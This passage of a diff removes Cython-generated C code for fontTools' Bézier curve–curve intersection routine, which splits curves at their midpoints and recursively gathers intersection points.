1322, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_midpoint = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1326 - * - * # If they do overlap but they're tiny, approximate - * if rectArea(bounds1) < precision and rectArea(bounds2) < precision: # <<<<<<<<<<<<<< - * return [(midpoint(range1), midpoint(range2))] - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_rectArea); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, 
function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_v_bounds1}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_cur_scope->__pyx_v_precision, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_5) { - } else { - __pyx_t_6 = __pyx_t_5; - goto __pyx_L9_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_rectArea); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_v_bounds2}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - __pyx_t_1 = PyObject_RichCompare(__pyx_t_3, __pyx_cur_scope->__pyx_v_precision, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) 
__PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_6 = __pyx_t_5; - __pyx_L9_bool_binop_done:; - if (__pyx_t_6) { - - /* "fontTools/misc/bezierTools.py":1327 - * # If they do overlap but they're tiny, approximate - * if rectArea(bounds1) < precision and rectArea(bounds2) < precision: - * return [(midpoint(range1), midpoint(range2))] # <<<<<<<<<<<<<< - * - * c11, c12 = _split_segment_at_t(curve1, 0.5) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1327, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1327, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1327, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1)) __PYX_ERR(0, 1327, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_3)) __PYX_ERR(0, 1327, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_3 = 0; - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1327, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 1327, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1326 - * - * # If they do overlap but they're tiny, approximate - * if rectArea(bounds1) < precision and rectArea(bounds2) < precision: # <<<<<<<<<<<<<< - * return [(midpoint(range1), midpoint(range2))] - * - */ - } - - /* "fontTools/misc/bezierTools.py":1329 - * return [(midpoint(range1), midpoint(range2))] - * - * c11, c12 = _split_segment_at_t(curve1, 
0.5) # <<<<<<<<<<<<<< - * c11_range = (range1[0], midpoint(range1)) - * c12_range = (midpoint(range1), range1[1]) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_split_segment_at_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_curve1, __pyx_float_0_5}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_3))) || (PyList_CheckExact(__pyx_t_3))) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1329, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - 
__Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_7 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - index = 0; __pyx_t_2 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_2)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_1)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 2) < 0) __PYX_ERR(0, 1329, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L12_unpacking_done; - __pyx_L11_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1329, __pyx_L1_error) - __pyx_L12_unpacking_done:; - } - __pyx_v_c11 = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_c12 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1330 - * - * c11, c12 = _split_segment_at_t(curve1, 0.5) - * c11_range = (range1[0], midpoint(range1)) # <<<<<<<<<<<<<< - * c12_range = (midpoint(range1), range1[1]) - * - */ - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_range1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1330, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1330, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1330, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_3)) __PYX_ERR(0, 1330, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if 
(__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_1)) __PYX_ERR(0, 1330, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_1 = 0; - __pyx_v_c11_range = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1331 - * c11, c12 = _split_segment_at_t(curve1, 0.5) - * c11_range = (range1[0], midpoint(range1)) - * c12_range = (midpoint(range1), range1[1]) # <<<<<<<<<<<<<< - * - * c21, c22 = _split_segment_at_t(curve2, 0.5) - */ - __pyx_t_2 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1331, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_range1, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1331, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1331, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 1331, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1)) __PYX_ERR(0, 1331, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_1 = 0; - __pyx_v_c12_range = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1333 - * c12_range = (midpoint(range1), range1[1]) - * - * c21, c22 = _split_segment_at_t(curve2, 0.5) # <<<<<<<<<<<<<< - * c21_range = (range2[0], midpoint(range2)) - * c22_range = (midpoint(range2), range2[1]) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_split_segment_at_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - 
__Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_curve2, __pyx_float_0_5}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_3))) || (PyList_CheckExact(__pyx_t_3))) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1333, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_7 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - index = 0; __pyx_t_1 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_1)) goto __pyx_L13_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_2)) goto __pyx_L13_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if 
(__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 2) < 0) __PYX_ERR(0, 1333, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L14_unpacking_done; - __pyx_L13_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1333, __pyx_L1_error) - __pyx_L14_unpacking_done:; - } - __pyx_v_c21 = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_c22 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1334 - * - * c21, c22 = _split_segment_at_t(curve2, 0.5) - * c21_range = (range2[0], midpoint(range2)) # <<<<<<<<<<<<<< - * c22_range = (midpoint(range2), range2[1]) - * - */ - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_range2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1334, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1334, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1334, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_3)) __PYX_ERR(0, 1334, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_2)) __PYX_ERR(0, 1334, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_2 = 0; - __pyx_v_c21_range = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1335 - * c21, c22 = _split_segment_at_t(curve2, 0.5) - * c21_range = (range2[0], midpoint(range2)) - * c22_range = (midpoint(range2), range2[1]) # <<<<<<<<<<<<<< - * - * found = [] - */ - __pyx_t_1 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1335, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_range2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1335, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1335, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 1335, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2)) __PYX_ERR(0, 1335, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_v_c22_range = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1337 - * c22_range = (midpoint(range2), range2[1]) - * - * found = [] # <<<<<<<<<<<<<< - * found.extend( - * _curve_curve_intersections_t( - */ - __pyx_t_3 = PyList_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1337, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_found = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1339 - * found = [] - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c11, c21, precision, range1=c11_range, range2=c21_range - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1339, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - - /* "fontTools/misc/bezierTools.py":1340 - * found.extend( - * _curve_curve_intersections_t( - * c11, c21, precision, range1=c11_range, range2=c21_range # <<<<<<<<<<<<<< - * ) - * ) - */ - __pyx_t_2 = PyTuple_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1339, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_c11); - __Pyx_GIVEREF(__pyx_v_c11); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_c11)) __PYX_ERR(0, 1339, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c21); - __Pyx_GIVEREF(__pyx_v_c21); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_c21)) __PYX_ERR(0, 1339, __pyx_L1_error); - 
__Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 2, __pyx_cur_scope->__pyx_v_precision)) __PYX_ERR(0, 1339, __pyx_L1_error); - __pyx_t_1 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1340, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_range1, __pyx_v_c11_range) < 0) __PYX_ERR(0, 1340, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_range2, __pyx_v_c21_range) < 0) __PYX_ERR(0, 1340, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1339 - * found = [] - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c11, c21, precision, range1=c11_range, range2=c21_range - * ) - */ - __pyx_t_7 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1339, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1338 - * - * found = [] - * found.extend( # <<<<<<<<<<<<<< - * _curve_curve_intersections_t( - * c11, c21, precision, range1=c11_range, range2=c21_range - */ - __pyx_t_9 = __Pyx_PyList_Extend(__pyx_v_found, __pyx_t_7); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1338, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - - /* "fontTools/misc/bezierTools.py":1344 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c12, c21, precision, range1=c12_range, range2=c21_range - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1344, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - - /* "fontTools/misc/bezierTools.py":1345 - * found.extend( - * _curve_curve_intersections_t( - * c12, c21, precision, range1=c12_range, range2=c21_range # <<<<<<<<<<<<<< - * ) - * ) - */ - __pyx_t_1 = PyTuple_New(3); 
if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1344, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_c12); - __Pyx_GIVEREF(__pyx_v_c12); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_c12)) __PYX_ERR(0, 1344, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c21); - __Pyx_GIVEREF(__pyx_v_c21); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_c21)) __PYX_ERR(0, 1344, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_cur_scope->__pyx_v_precision)) __PYX_ERR(0, 1344, __pyx_L1_error); - __pyx_t_2 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1345, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_range1, __pyx_v_c12_range) < 0) __PYX_ERR(0, 1345, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_range2, __pyx_v_c21_range) < 0) __PYX_ERR(0, 1345, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1344 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c12, c21, precision, range1=c12_range, range2=c21_range - * ) - */ - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_7, __pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1344, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1343 - * ) - * ) - * found.extend( # <<<<<<<<<<<<<< - * _curve_curve_intersections_t( - * c12, c21, precision, range1=c12_range, range2=c21_range - */ - __pyx_t_9 = __Pyx_PyList_Extend(__pyx_v_found, __pyx_t_3); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1343, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1349 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c11, c22, precision, range1=c11_range, range2=c22_range - * ) - */ - 
__Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1349, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - - /* "fontTools/misc/bezierTools.py":1350 - * found.extend( - * _curve_curve_intersections_t( - * c11, c22, precision, range1=c11_range, range2=c22_range # <<<<<<<<<<<<<< - * ) - * ) - */ - __pyx_t_2 = PyTuple_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1349, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_c11); - __Pyx_GIVEREF(__pyx_v_c11); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_c11)) __PYX_ERR(0, 1349, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c22); - __Pyx_GIVEREF(__pyx_v_c22); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_c22)) __PYX_ERR(0, 1349, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 2, __pyx_cur_scope->__pyx_v_precision)) __PYX_ERR(0, 1349, __pyx_L1_error); - __pyx_t_1 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1350, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_range1, __pyx_v_c11_range) < 0) __PYX_ERR(0, 1350, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_range2, __pyx_v_c22_range) < 0) __PYX_ERR(0, 1350, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1349 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c11, c22, precision, range1=c11_range, range2=c22_range - * ) - */ - __pyx_t_7 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_7)) 